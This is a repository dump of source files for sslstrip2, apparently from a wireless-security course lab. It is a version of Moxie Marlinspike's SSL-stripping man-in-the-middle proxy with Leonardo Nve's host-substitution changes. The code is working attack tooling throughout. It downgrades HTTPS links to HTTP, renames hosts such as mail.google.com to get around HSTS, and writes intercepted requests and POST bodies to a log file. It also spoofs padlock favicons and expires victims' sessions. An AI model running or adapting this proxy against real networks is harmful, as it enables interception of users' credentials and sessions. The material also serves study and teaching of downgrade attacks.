self.shutdown() 121 | else: 122 | HTTPClient.handleResponseEnd(self) 123 | 124 | def 
handleResponse(self, data): 125 | if (self.isCompressed): 126 | logging.debug("Decompressing content...") 127 | data = gzip.GzipFile('', 'rb', 9, StringIO.StringIO(data)).read() 128 | 129 | #logging.log(self.getLogLevel(), "Read from server:\n" + data) 130 | logging.log(self.getLogLevel(), "Read from server:\n " ) 131 | 132 | 133 | data = self.replaceSecureLinks(data) 134 | 135 | if (self.contentLength != None): 136 | self.client.setHeader('Content-Length', len(data)) 137 | 138 | self.client.write(data) 139 | self.shutdown() 140 | 141 | def replaceSecureLinks(self, data): 142 | iterator = re.finditer(ServerConnection.urlExpression, data) 143 | 144 | for match in iterator: 145 | url = match.group() 146 | 147 | logging.debug("Found secure reference: " + url) 148 | self.urlMonitor.addSecureLink(self.client.getClientIP(), url) 149 | 150 | data = re.sub(ServerConnection.urlExplicitPort, r'https://\1/', data) 151 | 152 | iter2 = re.finditer(ServerConnection.urlToken1, data) 153 | for match in iter2: 154 | encontrado = match.group() 155 | logging.debug("Token find: "+encontrado+", parsing...") 156 | 157 | iter2 = re.finditer(ServerConnection.urlToken2, data) 158 | for match in iter2: 159 | encontrado = match.group() 160 | logging.debug("Token find: "+encontrado+", parsing....") 161 | 162 | #data = re.sub(ServerConnection.urlToken2, r'\1?ssltoken=1',data) 163 | #data = re.sub(ServerConnection.urlToken1, r'\1ssltoken=1&',data) 164 | return re.sub(ServerConnection.urlType, 'http://', data) 165 | 166 | 167 | def shutdown(self): 168 | if not self.shutdownComplete: 169 | self.shutdownComplete = True 170 | self.client.finish() 171 | self.transport.loseConnection() 172 | 173 | 174 | -------------------------------------------------------------------------------- /lab4/sslstrip2/build/lib.linux-i686-2.7/sslstrip/ServerConnectionFactory.py: -------------------------------------------------------------------------------- 1 | # Copyright (c) 2004-2009 Moxie Marlinspike 2 | # 3 | # 
This program is free software; you can redistribute it and/or 4 | # modify it under the terms of the GNU General Public License as 5 | # published by the Free Software Foundation; either version 3 of the 6 | # License, or (at your option) any later version. 7 | # 8 | # This program is distributed in the hope that it will be useful, but 9 | # WITHOUT ANY WARRANTY; without even the implied warranty of 10 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 11 | # General Public License for more details. 12 | # 13 | # You should have received a copy of the GNU General Public License 14 | # along with this program; if not, write to the Free Software 15 | # Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 16 | # USA 17 | # 18 | 19 | import logging 20 | from twisted.internet.protocol import ClientFactory 21 | 22 | class ServerConnectionFactory(ClientFactory): 23 | 24 | def __init__(self, command, uri, postData, headers, client): 25 | self.command = command 26 | self.uri = uri 27 | self.postData = postData 28 | self.headers = headers 29 | self.client = client 30 | 31 | def buildProtocol(self, addr): 32 | return self.protocol(self.command, self.uri, self.postData, self.headers, self.client) 33 | 34 | def clientConnectionFailed(self, connector, reason): 35 | logging.debug("Server connection failed.") 36 | 37 | destination = connector.getDestination() 38 | 39 | if (destination.port != 443): 40 | logging.debug("Retrying via SSL") 41 | self.client.proxyViaSSL(self.headers['host'], self.command, self.uri, self.postData, self.headers, 443) 42 | else: 43 | self.client.finish() 44 | 45 | -------------------------------------------------------------------------------- /lab4/sslstrip2/build/lib.linux-i686-2.7/sslstrip/StrippingProxy.py: -------------------------------------------------------------------------------- 1 | # Copyright (c) 2004-2009 Moxie Marlinspike 2 | # 3 | # This program is free software; you can redistribute it and/or 4 | # modify 
it under the terms of the GNU General Public License as 5 | # published by the Free Software Foundation; either version 3 of the 6 | # License, or (at your option) any later version. 7 | # 8 | # This program is distributed in the hope that it will be useful, but 9 | # WITHOUT ANY WARRANTY; without even the implied warranty of 10 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 11 | # General Public License for more details. 12 | # 13 | # You should have received a copy of the GNU General Public License 14 | # along with this program; if not, write to the Free Software 15 | # Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 16 | # USA 17 | # 18 | 19 | from twisted.web.http import HTTPChannel 20 | from ClientRequest import ClientRequest 21 | 22 | class StrippingProxy(HTTPChannel): 23 | '''sslstrip is, at heart, a transparent proxy server that does some unusual things. 24 | This is the basic proxy server class, where we get callbacks for GET and POST methods. 25 | We then proxy these out using HTTP or HTTPS depending on what information we have about 26 | the (connection, client_address) tuple in our cache. 27 | ''' 28 | 29 | requestFactory = ClientRequest 30 | -------------------------------------------------------------------------------- /lab4/sslstrip2/build/lib.linux-i686-2.7/sslstrip/URLMonitor.py: -------------------------------------------------------------------------------- 1 | # Copyright (c) 2004-2009 Moxie Marlinspike 2 | # 3 | # This program is free software; you can redistribute it and/or 4 | # modify it under the terms of the GNU General Public License as 5 | # published by the Free Software Foundation; either version 3 of the 6 | # License, or (at your option) any later version. 7 | # 8 | # This program is distributed in the hope that it will be useful, but 9 | # WITHOUT ANY WARRANTY; without even the implied warranty of 10 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the GNU 11 | # General Public License for more details. 12 | # 13 | # You should have received a copy of the GNU General Public License 14 | # along with this program; if not, write to the Free Software 15 | # Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 16 | # USA 17 | # 18 | 19 | import re 20 | 21 | class URLMonitor: 22 | 23 | ''' 24 | The URL monitor maintains a set of (client, url) tuples that correspond to requests which the 25 | server is expecting over SSL. It also keeps track of secure favicon urls. 26 | ''' 27 | 28 | # Start the arms race, and end up here... 29 | javascriptTrickery = [re.compile("http://.+\.etrade\.com/javascript/omntr/tc_targeting\.html")] 30 | _instance = None 31 | sustitucion = {} # LEO: diccionario host / sustitucion 32 | real = {} # LEO: diccionario host / sustitucion 33 | 34 | def __init__(self): 35 | self.strippedURLs = set() 36 | self.strippedURLPorts = {} 37 | self.faviconReplacement = False 38 | self.sustitucion["mail.google.com"] = "gmail.google.com" 39 | self.real["gmail.google.com"] = "mail.google.com" 40 | 41 | 42 | def isSecureLink(self, client, url): 43 | for expression in URLMonitor.javascriptTrickery: 44 | if (re.match(expression, url)): 45 | return True 46 | 47 | return (client,url) in self.strippedURLs 48 | 49 | def getSecurePort(self, client, url): 50 | if (client,url) in self.strippedURLs: 51 | return self.strippedURLPorts[(client,url)] 52 | else: 53 | return 443 54 | 55 | def addSecureLink(self, client, url): 56 | methodIndex = url.find("//") + 2 57 | method = url[0:methodIndex] 58 | 59 | pathIndex = url.find("/", methodIndex) 60 | host = url[methodIndex:pathIndex] 61 | path = url[pathIndex:] 62 | 63 | port = 443 64 | portIndex = host.find(":") 65 | 66 | if (portIndex != -1): 67 | host = host[0:portIndex] 68 | port = host[portIndex+1:] 69 | if len(port) == 0: 70 | port = 443 71 | 72 | #LEO: Sustituir HOST 73 | 74 | if self.sustitucion.has_key(host.lower()): 75 | host = 
self.sustitucion[host.lower()] 76 | else: 77 | lhost = host.lower()[:4] 78 | if lhost=="www.": 79 | self.sustitucion[host.lower()] = "w"+host.lower() 80 | self.real["w"+host.lower()] = host.lower() 81 | else: 82 | self.sustitucion[host.lower()] = "web."+host.lower() 83 | self.real["web."+host.lower()] = host.lower() 84 | 85 | url = method + host + path 86 | 87 | self.strippedURLs.add((client, url)) 88 | self.strippedURLPorts[(client, url)] = int(port) 89 | 90 | def setFaviconSpoofing(self, faviconSpoofing): 91 | self.faviconSpoofing = faviconSpoofing 92 | 93 | def isFaviconSpoofing(self): 94 | return self.faviconSpoofing 95 | 96 | def isSecureFavicon(self, client, url): 97 | return ((self.faviconSpoofing == True) and (url.find("favicon-x-favicon-x.ico") != -1)) 98 | 99 | def URLgetRealHost(host): 100 | if self.real.has_key(host): 101 | return self.real[host] 102 | else: 103 | return host 104 | 105 | def getInstance(): 106 | if URLMonitor._instance == None: 107 | URLMonitor._instance = URLMonitor() 108 | 109 | return URLMonitor._instance 110 | 111 | getInstance = staticmethod(getInstance) 112 | -------------------------------------------------------------------------------- /lab4/sslstrip2/build/lib.linux-i686-2.7/sslstrip/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/s0lst1c3/awae/89ec7da010a3b31713bb6c5edb8305d6554cf37f/lab4/sslstrip2/build/lib.linux-i686-2.7/sslstrip/__init__.py -------------------------------------------------------------------------------- /lab4/sslstrip2/build/scripts-2.6/sslstrip: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | """sslstrip is a MITM tool that implements Moxie Marlinspike's SSL stripping attacks.""" 4 | 5 | __author__ = "Moxie Marlinspike && Version b by Leonardo Nve" 6 | __email__ = "moxie@thoughtcrime.org && leonardo.nve@gmail.com" 7 | __license__= """ 8 | Copyright (c) 2004-2009 
Moxie Marlinspike 9 | 10 | This program is free software; you can redistribute it and/or 11 | modify it under the terms of the GNU General Public License as 12 | published by the Free Software Foundation; either version 3 of the 13 | License, or (at your option) any later version. 14 | 15 | This program is distributed in the hope that it will be useful, but 16 | WITHOUT ANY WARRANTY; without even the implied warranty of 17 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 18 | General Public License for more details. 19 | 20 | You should have received a copy of the GNU General Public License 21 | along with this program; if not, write to the Free Software 22 | Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 23 | USA 24 | 25 | """ 26 | 27 | from twisted.web import http 28 | from twisted.internet import reactor 29 | 30 | from sslstrip.StrippingProxy import StrippingProxy 31 | from sslstrip.URLMonitor import URLMonitor 32 | from sslstrip.CookieCleaner import CookieCleaner 33 | 34 | import sys, getopt, logging, traceback, string, os 35 | 36 | gVersion = "0.9 Adv" 37 | 38 | def usage(): 39 | print "\nsslstrip " + gVersion + " by Moxie Marlinspike" 40 | print "Version Adv by Leonardo Nve" 41 | print "Usage: sslstrip \n" 42 | print "Options:" 43 | print "-w , --write= Specify file to log to (optional)." 44 | print "-p , --post Log only SSL POSTs. (default)" 45 | print "-s , --ssl Log all SSL traffic to and from server." 46 | print "-a , --all Log all SSL and HTTP traffic to and from server." 47 | print "-l , --listen= Port to listen on (default 10000)." 48 | print "-f , --favicon Substitute a lock favicon on secure requests." 49 | print "-k , --killsessions Kill sessions in progress." 50 | print "-h Print this help message." 
51 | print "" 52 | 53 | def parseOptions(argv): 54 | logFile = 'sslstrip.log' 55 | logLevel = logging.WARNING 56 | listenPort = 10000 57 | spoofFavicon = False 58 | killSessions = False 59 | 60 | try: 61 | opts, args = getopt.getopt(argv, "hw:l:psafk", 62 | ["help", "write=", "post", "ssl", "all", "listen=", 63 | "favicon", "killsessions"]) 64 | 65 | for opt, arg in opts: 66 | if opt in ("-h", "--help"): 67 | usage() 68 | sys.exit() 69 | elif opt in ("-w", "--write"): 70 | logFile = arg 71 | elif opt in ("-p", "--post"): 72 | logLevel = logging.WARNING 73 | elif opt in ("-s", "--ssl"): 74 | logLevel = logging.INFO 75 | elif opt in ("-a", "--all"): 76 | logLevel = logging.DEBUG 77 | elif opt in ("-l", "--listen"): 78 | listenPort = arg 79 | elif opt in ("-f", "--favicon"): 80 | spoofFavicon = True 81 | elif opt in ("-k", "--killsessions"): 82 | killSessions = True 83 | 84 | return (logFile, logLevel, listenPort, spoofFavicon, killSessions) 85 | 86 | except getopt.GetoptError: 87 | usage() 88 | sys.exit(2) 89 | 90 | def main(argv): 91 | (logFile, logLevel, listenPort, spoofFavicon, killSessions) = parseOptions(argv) 92 | 93 | logging.basicConfig(level=logLevel, format='%(asctime)s %(message)s', 94 | filename=logFile, filemode='w') 95 | 96 | URLMonitor.getInstance().setFaviconSpoofing(spoofFavicon) 97 | CookieCleaner.getInstance().setEnabled(killSessions) 98 | 99 | strippingFactory = http.HTTPFactory(timeout=10) 100 | strippingFactory.protocol = StrippingProxy 101 | 102 | reactor.listenTCP(int(listenPort), strippingFactory) 103 | 104 | print "\nsslstrip " + gVersion + " by Moxie Marlinspike running..." 
105 | print "Adv POC by Leonardo Nve" 106 | 107 | reactor.run() 108 | 109 | if __name__ == '__main__': 110 | main(sys.argv[1:]) 111 | -------------------------------------------------------------------------------- /lab4/sslstrip2/build/scripts-2.7/sslstrip: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | """sslstrip is a MITM tool that implements Moxie Marlinspike's SSL stripping attacks.""" 4 | 5 | __author__ = "Moxie Marlinspike" 6 | __email__ = "moxie@thoughtcrime.org" 7 | __license__= """ 8 | Copyright (c) 2004-2009 Moxie Marlinspike 9 | 10 | This program is free software; you can redistribute it and/or 11 | modify it under the terms of the GNU General Public License as 12 | published by the Free Software Foundation; either version 3 of the 13 | License, or (at your option) any later version. 14 | 15 | This program is distributed in the hope that it will be useful, but 16 | WITHOUT ANY WARRANTY; without even the implied warranty of 17 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 18 | General Public License for more details. 19 | 20 | You should have received a copy of the GNU General Public License 21 | along with this program; if not, write to the Free Software 22 | Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 23 | USA 24 | 25 | """ 26 | 27 | from twisted.web import http 28 | from twisted.internet import reactor 29 | 30 | from sslstrip.StrippingProxy import StrippingProxy 31 | from sslstrip.URLMonitor import URLMonitor 32 | from sslstrip.CookieCleaner import CookieCleaner 33 | 34 | import sys, getopt, logging, traceback, string, os 35 | 36 | gVersion = "0.9b" 37 | 38 | def usage(): 39 | print "\nsslstrip " + gVersion + " by Moxie Marlinspike" 40 | print "Version b by Leonardo Nve" 41 | print "Usage: sslstrip \n" 42 | print "Options:" 43 | print "-w , --write= Specify file to log to (optional)." 44 | print "-p , --post Log only SSL POSTs. 
(default)" 45 | print "-s , --ssl Log all SSL traffic to and from server." 46 | print "-a , --all Log all SSL and HTTP traffic to and from server." 47 | print "-l , --listen= Port to listen on (default 10000)." 48 | print "-f , --favicon Substitute a lock favicon on secure requests." 49 | print "-k , --killsessions Kill sessions in progress." 50 | print "-h Print this help message." 51 | print "" 52 | 53 | def parseOptions(argv): 54 | logFile = 'sslstrip.log' 55 | logLevel = logging.WARNING 56 | listenPort = 10000 57 | spoofFavicon = False 58 | killSessions = False 59 | 60 | try: 61 | opts, args = getopt.getopt(argv, "hw:l:psafk", 62 | ["help", "write=", "post", "ssl", "all", "listen=", 63 | "favicon", "killsessions"]) 64 | 65 | for opt, arg in opts: 66 | if opt in ("-h", "--help"): 67 | usage() 68 | sys.exit() 69 | elif opt in ("-w", "--write"): 70 | logFile = arg 71 | elif opt in ("-p", "--post"): 72 | logLevel = logging.WARNING 73 | elif opt in ("-s", "--ssl"): 74 | logLevel = logging.INFO 75 | elif opt in ("-a", "--all"): 76 | logLevel = logging.DEBUG 77 | elif opt in ("-l", "--listen"): 78 | listenPort = arg 79 | elif opt in ("-f", "--favicon"): 80 | spoofFavicon = True 81 | elif opt in ("-k", "--killsessions"): 82 | killSessions = True 83 | 84 | return (logFile, logLevel, listenPort, spoofFavicon, killSessions) 85 | 86 | except getopt.GetoptError: 87 | usage() 88 | sys.exit(2) 89 | 90 | def main(argv): 91 | (logFile, logLevel, listenPort, spoofFavicon, killSessions) = parseOptions(argv) 92 | 93 | logging.basicConfig(level=logLevel, format='%(asctime)s %(message)s', 94 | filename=logFile, filemode='w') 95 | 96 | URLMonitor.getInstance().setFaviconSpoofing(spoofFavicon) 97 | CookieCleaner.getInstance().setEnabled(killSessions) 98 | 99 | strippingFactory = http.HTTPFactory(timeout=10) 100 | strippingFactory.protocol = StrippingProxy 101 | 102 | reactor.listenTCP(int(listenPort), strippingFactory) 103 | 104 | print "\nsslstrip " + gVersion + " by Moxie 
Marlinspike running..." 105 | 106 | reactor.run() 107 | 108 | if __name__ == '__main__': 109 | main(sys.argv[1:]) 110 | -------------------------------------------------------------------------------- /lab4/sslstrip2/debug_ssl.log: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /lab4/sslstrip2/lock.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/s0lst1c3/awae/89ec7da010a3b31713bb6c5edb8305d6554cf37f/lab4/sslstrip2/lock.ico -------------------------------------------------------------------------------- /lab4/sslstrip2/poc.log: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/s0lst1c3/awae/89ec7da010a3b31713bb6c5edb8305d6554cf37f/lab4/sslstrip2/poc.log -------------------------------------------------------------------------------- /lab4/sslstrip2/setup.py: -------------------------------------------------------------------------------- 1 | import sys, os, shutil 2 | from distutils.core import setup, Extension 3 | 4 | 5 | shutil.copyfile("sslstrip.py", "sslstrip/sslstrip") 6 | 7 | setup (name = 'sslstrip', 8 | version = '0.9', 9 | description = 'A MITM tool that implements Moxie Marlinspike\'s HTTPS stripping attacks.', 10 | author = 'Moxie Marlinspike', 11 | author_email = 'moxie@thoughtcrime.org', 12 | url = 'http://www.thoughtcrime.org/software/sslstrip/', 13 | license = 'GPL', 14 | packages = ["sslstrip"], 15 | package_dir = {'sslstrip' : 'sslstrip/'}, 16 | scripts = ['sslstrip/sslstrip'], 17 | data_files = [('share/sslstrip', ['README', 'COPYING', 'lock.ico'])], 18 | ) 19 | 20 | print "Cleaning up..." 
21 | try: 22 | removeall("build/") 23 | os.rmdir("build/") 24 | except: 25 | pass 26 | 27 | try: 28 | os.remove("sslstrip/sslstrip") 29 | except: 30 | pass 31 | 32 | def capture(cmd): 33 | return os.popen(cmd).read().strip() 34 | 35 | def removeall(path): 36 | if not os.path.isdir(path): 37 | return 38 | 39 | files=os.listdir(path) 40 | 41 | for x in files: 42 | fullpath=os.path.join(path, x) 43 | if os.path.isfile(fullpath): 44 | f=os.remove 45 | rmgeneric(fullpath, f) 46 | elif os.path.isdir(fullpath): 47 | removeall(fullpath) 48 | f=os.rmdir 49 | rmgeneric(fullpath, f) 50 | 51 | def rmgeneric(path, __func__): 52 | try: 53 | __func__(path) 54 | except OSError, (errno, strerror): 55 | pass 56 | -------------------------------------------------------------------------------- /lab4/sslstrip2/sslstrip.log: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/s0lst1c3/awae/89ec7da010a3b31713bb6c5edb8305d6554cf37f/lab4/sslstrip2/sslstrip.log -------------------------------------------------------------------------------- /lab4/sslstrip2/sslstrip.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """sslstrip is a MITM tool that implements Moxie Marlinspike's SSL stripping attacks.""" 4 | 5 | __author__ = "Moxie Marlinspike && Version + by Leonardo Nve" 6 | __email__ = "moxie@thoughtcrime.org && leonardo.nve@gmail.com" 7 | __license__= """ 8 | Copyright (c) 2004-2009 Moxie Marlinspike 9 | 10 | This program is free software; you can redistribute it and/or 11 | modify it under the terms of the GNU General Public License as 12 | published by the Free Software Foundation; either version 3 of the 13 | License, or (at your option) any later version. 14 | 15 | This program is distributed in the hope that it will be useful, but 16 | WITHOUT ANY WARRANTY; without even the implied warranty of 17 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the GNU 18 | General Public License for more details. 19 | 20 | You should have received a copy of the GNU General Public License 21 | along with this program; if not, write to the Free Software 22 | Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 23 | USA 24 | 25 | """ 26 | 27 | from twisted.web import http 28 | from twisted.internet import reactor 29 | 30 | from sslstrip.StrippingProxy import StrippingProxy 31 | from sslstrip.URLMonitor import URLMonitor 32 | from sslstrip.CookieCleaner import CookieCleaner 33 | 34 | import sys, getopt, logging, traceback, string, os 35 | 36 | gVersion = "0.9 +" 37 | 38 | def usage(): 39 | print "\nsslstrip " + gVersion + " by Moxie Marlinspike" 40 | print "Version + by Leonardo Nve" 41 | print "Usage: sslstrip \n" 42 | print "Options:" 43 | print "-w , --write= Specify file to log to (optional)." 44 | print "-p , --post Log only SSL POSTs. (default)" 45 | print "-s , --ssl Log all SSL traffic to and from server." 46 | print "-a , --all Log all SSL and HTTP traffic to and from server." 47 | print "-l , --listen= Port to listen on (default 10000)." 48 | print "-f , --favicon Substitute a lock favicon on secure requests." 49 | print "-k , --killsessions Kill sessions in progress." 50 | print "-h Print this help message." 
51 | print "" 52 | 53 | def parseOptions(argv): 54 | logFile = 'sslstrip.log' 55 | logLevel = logging.WARNING 56 | listenPort = 10000 57 | spoofFavicon = False 58 | killSessions = False 59 | 60 | try: 61 | opts, args = getopt.getopt(argv, "hw:l:psafk", 62 | ["help", "write=", "post", "ssl", "all", "listen=", 63 | "favicon", "killsessions"]) 64 | 65 | for opt, arg in opts: 66 | if opt in ("-h", "--help"): 67 | usage() 68 | sys.exit() 69 | elif opt in ("-w", "--write"): 70 | logFile = arg 71 | elif opt in ("-p", "--post"): 72 | logLevel = logging.WARNING 73 | elif opt in ("-s", "--ssl"): 74 | logLevel = logging.INFO 75 | elif opt in ("-a", "--all"): 76 | logLevel = logging.DEBUG 77 | elif opt in ("-l", "--listen"): 78 | listenPort = arg 79 | elif opt in ("-f", "--favicon"): 80 | spoofFavicon = True 81 | elif opt in ("-k", "--killsessions"): 82 | killSessions = True 83 | 84 | return (logFile, logLevel, listenPort, spoofFavicon, killSessions) 85 | 86 | except getopt.GetoptError: 87 | usage() 88 | sys.exit(2) 89 | 90 | def main(argv): 91 | (logFile, logLevel, listenPort, spoofFavicon, killSessions) = parseOptions(argv) 92 | 93 | logging.basicConfig(level=logLevel, format='%(asctime)s %(message)s', 94 | filename=logFile, filemode='w') 95 | 96 | URLMonitor.getInstance().setFaviconSpoofing(spoofFavicon) 97 | CookieCleaner.getInstance().setEnabled(killSessions) 98 | 99 | strippingFactory = http.HTTPFactory(timeout=10) 100 | strippingFactory.protocol = StrippingProxy 101 | 102 | reactor.listenTCP(int(listenPort), strippingFactory) 103 | 104 | print "\nsslstrip " + gVersion + " by Moxie Marlinspike running..." 
105 | print "+ POC by Leonardo Nve" 106 | 107 | reactor.run() 108 | 109 | if __name__ == '__main__': 110 | main(sys.argv[1:]) 111 | -------------------------------------------------------------------------------- /lab4/sslstrip2/sslstrip/ClientRequest.py: -------------------------------------------------------------------------------- 1 | # Copyright (c) 2004-2009 Moxie Marlinspike 2 | # 3 | # This program is free software; you can redistribute it and/or 4 | # modify it under the terms of the GNU General Public License as 5 | # published by the Free Software Foundation; either version 3 of the 6 | # License, or (at your option) any later version. 7 | # 8 | # This program is distributed in the hope that it will be useful, but 9 | # WITHOUT ANY WARRANTY; without even the implied warranty of 10 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 11 | # General Public License for more details. 12 | # 13 | # You should have received a copy of the GNU General Public License 14 | # along with this program; if not, write to the Free Software 15 | # Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 16 | # USA 17 | # 18 | 19 | import urlparse, logging, os, sys, random, re 20 | 21 | from twisted.web.http import Request 22 | from twisted.web.http import HTTPChannel 23 | from twisted.web.http import HTTPClient 24 | 25 | from twisted.internet import ssl 26 | from twisted.internet import defer 27 | from twisted.internet import reactor 28 | from twisted.internet.protocol import ClientFactory 29 | 30 | from ServerConnectionFactory import ServerConnectionFactory 31 | from ServerConnection import ServerConnection 32 | from SSLServerConnection import SSLServerConnection 33 | from URLMonitor import URLMonitor 34 | from CookieCleaner import CookieCleaner 35 | from DnsCache import DnsCache 36 | 37 | def NUEVO_LOG(str): 38 | return 39 | 40 | class ClientRequest(Request): 41 | 42 | ''' This class represents incoming client requests and is essentially 
where 43 | the magic begins. Here we remove the client headers we dont like, and then 44 | respond with either favicon spoofing, session denial, or proxy through HTTP 45 | or SSL to the server. 46 | ''' 47 | 48 | def __init__(self, channel, queued, reactor=reactor): 49 | Request.__init__(self, channel, queued) 50 | self.reactor = reactor 51 | self.urlMonitor = URLMonitor.getInstance() 52 | self.cookieCleaner = CookieCleaner.getInstance() 53 | self.dnsCache = DnsCache.getInstance() 54 | # self.uniqueId = random.randint(0, 10000) 55 | 56 | def cleanHeaders(self): 57 | headers = self.getAllHeaders().copy() 58 | if 'accept-encoding' in headers: 59 | del headers['accept-encoding'] 60 | 61 | if 'referer' in headers: 62 | real = self.urlMonitor.real 63 | if len(real)>0: 64 | dregex = re.compile("(%s)" % "|".join(map(re.escape, real.keys()))) 65 | headers['referer'] = dregex.sub(lambda x: str(real[x.string[x.start() :x.end()]]), headers['referer']) 66 | 67 | if 'if-modified-since' in headers: 68 | del headers['if-modified-since'] 69 | 70 | if 'cache-control' in headers: 71 | del headers['cache-control'] 72 | 73 | if 'if-none-match' in headers: 74 | del headers['if-none-match'] 75 | 76 | if 'host' in headers: 77 | host = self.urlMonitor.URLgetRealHost("%s"%headers['host']) 78 | logging.debug("Modifing HOST header: %s -> %s"%(headers['host'],host)) 79 | headers['host'] = host 80 | #headers['securelink'] = '1' 81 | self.setHeader('Host',host) 82 | 83 | return headers 84 | 85 | def getPathFromUri(self): 86 | if (self.uri.find("http://") == 0): 87 | index = self.uri.find('/', 7) 88 | return self.uri[index:] 89 | 90 | return self.uri 91 | 92 | 93 | def getPathToLockIcon(self): 94 | if os.path.exists("lock.ico"): return "lock.ico" 95 | 96 | scriptPath = os.path.abspath(os.path.dirname(sys.argv[0])) 97 | scriptPath = os.path.join(scriptPath, "../share/sslstrip/lock.ico") 98 | 99 | if os.path.exists(scriptPath): return scriptPath 100 | 101 | logging.warning("Error: Could not find 
lock.ico") 102 | return "lock.ico" 103 | 104 | def save_req(self,lfile,str): 105 | f = open(lfile,"a") 106 | f.write(str) 107 | f.close() 108 | 109 | def handleHostResolvedSuccess(self, address): 110 | headers = self.cleanHeaders() 111 | # for header in headers: 112 | # logging.debug("HEADER %s = %s",header,headers[header]) 113 | logging.debug("Resolved host successfully: %s -> %s" % (self.getHeader('host').lower(), address)) 114 | lhost = self.getHeader("host").lower() 115 | host = self.urlMonitor.URLgetRealHost("%s"%lhost) 116 | client = self.getClientIP() 117 | path = self.getPathFromUri() 118 | self.content.seek(0,0) 119 | postData = self.content.read() 120 | real = self.urlMonitor.real 121 | patchDict = self.urlMonitor.patchDict 122 | 123 | if len(real)>0: 124 | dregex = re.compile("(%s)" % "|".join(map(re.escape, real.keys()))) 125 | path = dregex.sub(lambda x: str(real[x.string[x.start() :x.end()]]), path) 126 | postData = dregex.sub(lambda x: str(real[x.string[x.start() :x.end()]]), postData) 127 | if len(patchDict)>0: 128 | dregex = re.compile("(%s)" % "|".join(map(re.escape, patchDict.keys()))) 129 | postData = dregex.sub(lambda x: str(patchDict[x.string[x.start() :x.end()]]), postData) 130 | 131 | url = 'http://' + host + path 132 | headers['content-length']="%d"%len(postData) 133 | 134 | self.dnsCache.cacheResolution(host, address) 135 | if (not self.cookieCleaner.isClean(self.method, client, host, headers)): 136 | logging.debug("Sending expired cookies...") 137 | self.sendExpiredCookies(host, path, self.cookieCleaner.getExpireHeaders(self.method, client, 138 | host, headers, path)) 139 | elif (self.urlMonitor.isSecureFavicon(client, path)): 140 | logging.debug("Sending spoofed favicon response...") 141 | self.sendSpoofedFaviconResponse() 142 | elif (self.urlMonitor.isSecureLink(client, url) or ('securelink' in headers)): 143 | if 'securelink' in headers: 144 | del headers['securelink'] 145 | logging.debug("LEO Sending request via SSL...(%s 
%s)"%(client,url)) 146 | self.proxyViaSSL(address, self.method, path, postData, headers, 147 | self.urlMonitor.getSecurePort(client, url)) 148 | else: 149 | logging.debug("LEO Sending request via HTTP...") 150 | self.proxyViaHTTP(address, self.method, path, postData, headers) 151 | 152 | def handleHostResolvedError(self, error): 153 | logging.warning("Host resolution error: " + str(error)) 154 | self.finish() 155 | 156 | def resolveHost(self, host): 157 | address = self.dnsCache.getCachedAddress(host) 158 | 159 | if address != None: 160 | logging.debug("Host cached.") 161 | return defer.succeed(address) 162 | else: 163 | logging.debug("Host not cached.") 164 | return reactor.resolve(host) 165 | 166 | def process(self): 167 | host = self.urlMonitor.URLgetRealHost("%s"%self.getHeader('host')) 168 | logging.debug("Resolving host: %s" % host) 169 | deferred = self.resolveHost(host) 170 | 171 | deferred.addCallback(self.handleHostResolvedSuccess) 172 | deferred.addErrback(self.handleHostResolvedError) 173 | 174 | def proxyViaHTTP(self, host, method, path, postData, headers): 175 | connectionFactory = ServerConnectionFactory(method, path, postData, headers, self) 176 | self.save_req("debug_ssl.log",method+' http://'+host+path+'\n'+str(headers)+'\n'+postData+'\n') 177 | connectionFactory.protocol = ServerConnection 178 | self.reactor.connectTCP(host, 80, connectionFactory) 179 | 180 | def proxyViaSSL(self, host, method, path, postData, headers, port): 181 | self.save_req("debug_ssl.log",method+' https://'+host+path+'\n'+str(headers)+'\n'+postData+'\n') 182 | clientContextFactory = ssl.ClientContextFactory() 183 | connectionFactory = ServerConnectionFactory(method, path, postData, headers, self) 184 | connectionFactory.protocol = SSLServerConnection 185 | self.reactor.connectSSL(host, port, connectionFactory, clientContextFactory) 186 | 187 | def sendExpiredCookies(self, host, path, expireHeaders): 188 | self.setResponseCode(302, "Moved") 189 | self.setHeader("Connection", 
"close") 190 | self.setHeader("Location", "http://" + host + path) 191 | 192 | for header in expireHeaders: 193 | self.setHeader("Set-Cookie", header) 194 | 195 | self.finish() 196 | 197 | def sendSpoofedFaviconResponse(self): 198 | icoFile = open(self.getPathToLockIcon()) 199 | 200 | self.setResponseCode(200, "OK") 201 | self.setHeader("Content-type", "image/x-icon") 202 | self.write(icoFile.read()) 203 | 204 | icoFile.close() 205 | self.finish() 206 | -------------------------------------------------------------------------------- /lab4/sslstrip2/sslstrip/CookieCleaner.py: -------------------------------------------------------------------------------- 1 | # Copyright (c) 2004-2011 Moxie Marlinspike 2 | # 3 | # This program is free software; you can redistribute it and/or 4 | # modify it under the terms of the GNU General Public License as 5 | # published by the Free Software Foundation; either version 3 of the 6 | # License, or (at your option) any later version. 7 | # 8 | # This program is distributed in the hope that it will be useful, but 9 | # WITHOUT ANY WARRANTY; without even the implied warranty of 10 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 